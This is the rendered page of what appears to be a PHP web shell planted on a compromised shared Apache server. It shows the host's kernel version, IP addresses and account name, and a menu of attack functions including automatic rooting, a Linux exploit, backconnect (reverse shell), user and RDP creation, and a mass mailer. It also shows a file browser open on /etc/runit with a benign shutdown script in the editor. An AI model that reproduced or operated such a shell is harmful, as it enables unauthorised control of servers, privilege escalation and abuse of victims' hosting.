Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
runit /
[ HOME SHELL ]
Name
Size
Permission
Action
runsvdir
[ DIR ]
drwxr-xr-x
1
510
B
-rwxr-xr-x
2
1.43
KB
-rwxr-xr-x
3
516
B
-rwxr-xr-x
ctrlaltdel
189
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 3
#!/bin/sh exec 2>&1 PATH=/sbin:/usr/sbin:/bin:/usr/bin LAST=0 # While test -x is more natural, it does not consider file with # executable bit set on 'noexec' filesystem as executable, and /run # often is mounted as 'noexec'. [ $(stat -c %a /run/runit.reboot) = 100 ] && LAST=6 # used by /sbin/runlevel touch "/run/runit.runlevel.$LAST" echo 'Waiting for services to stop...' sv force-stop /etc/service/* sv exit /etc/service/* echo 'Running shutdown tasks...' /lib/runit/run_sysv_scripts "/etc/rc$LAST.d" stop
Close